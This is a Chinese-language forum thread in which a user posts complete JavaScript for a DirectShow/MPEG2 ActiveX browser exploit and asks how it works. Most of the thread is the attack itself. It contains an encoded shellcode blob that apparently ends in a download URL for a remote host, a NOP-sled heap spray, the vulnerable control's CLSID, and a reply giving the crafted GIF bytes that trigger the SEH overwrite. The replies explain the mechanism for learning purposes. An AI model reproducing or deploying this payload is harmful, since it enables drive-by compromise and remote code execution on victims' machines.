請教DirectShow 攻擊代碼

ryanking

Hi All
以下代碼是Direct show 的攻擊代碼,
#部份是我註解
想請問這代碼怎麼攻擊的
我只看到最後memory[x]   超生了300個,但攻擊如何產生的呢
感謝大家


var headersize=20;
var dashell=unescape('%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0%u43C7%u012C%u0000%u5100%u5053%u5050%u5050%u5750%uE850%u033B%u0000%u19E8%u0000%u6400%u04A1%u0000%u8D00%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64%u15EB%u448D%u0424%uE850%uFDE4%uFFFF%uE850%u0223%u0000%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC%u74C0%uC107%u0DCF%uF803%uF4EB%u3B36%u247C%u7528%u3EDF%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03%u8B3E%u8B04%uC503%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF%u7468%u7074%u2f3a%u772f%u7777%u6d2e%u7379%u646e%u2e61%u6f63%u2f6d%u2f77%u2e61%u7363%u0073');
bbbbs = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
seee = '9090';
saaa ='%u9';
skkk ='090%u';
sxxx = saaa + skkk + seee;
# sxxx  = %u9090%u090
var omybro=unescape(sxxx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace) omybro+=omybro;
#產生超長字串 omybro
bZmybr=omybro.substring(0,slackspace);
wjsccccccg=omybro.substring(0,omybro.length-slackspace);
while(wjsccccccg.length+slackspace<0x30000) wjsccccccg=wjsccccccg+wjsccccccg+bZmybr;
#產生超長字串 wjsccccccg
memory=new Array();
for(x=0;x<300;x++) memory[x]=wjsccccccg+dashell;
#產生300個 memory[x]   
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid=bbbbs;

lichun005

一个&引发的攻击
小聪已经分析了
通过覆盖SEH配合heap spray使得shellcode获得执行机会
楼主发的就是一段shellcode

雨宫优子

关键是那个logo.gif
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid=bbbbs;

创建一个MPEG2对象并且载入logo.gif
这个logo.gif是一个精心构造的GIF文件
代码如下00 03 00 00 11 20 34 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF  FF FF 0C 0C 0C 0C 00

当这个GIF的第14个字节开始的这部分数据被读入栈中后，造成缓冲区溢出覆盖掉SEH，使shellcode获得执行机会。由于js的内存申请从低地址0x00000000向高地址分配，所以代码里申请了300块一样的内存，这样做的目的是来用来保证地址0x0C0C0C0C在我们申请的内存范围内。这300块一样的内存中，前一部分是NOP，后面是ShellCode代码。所以，只要程序能跳转到0x0c0c0c0c地址，执行完大量的NOP指令后，最终将执行ShellCode。

gtyre1

我记得哪有说明过了。。。
忘了

ryanking

感謝大家的指導
非常感謝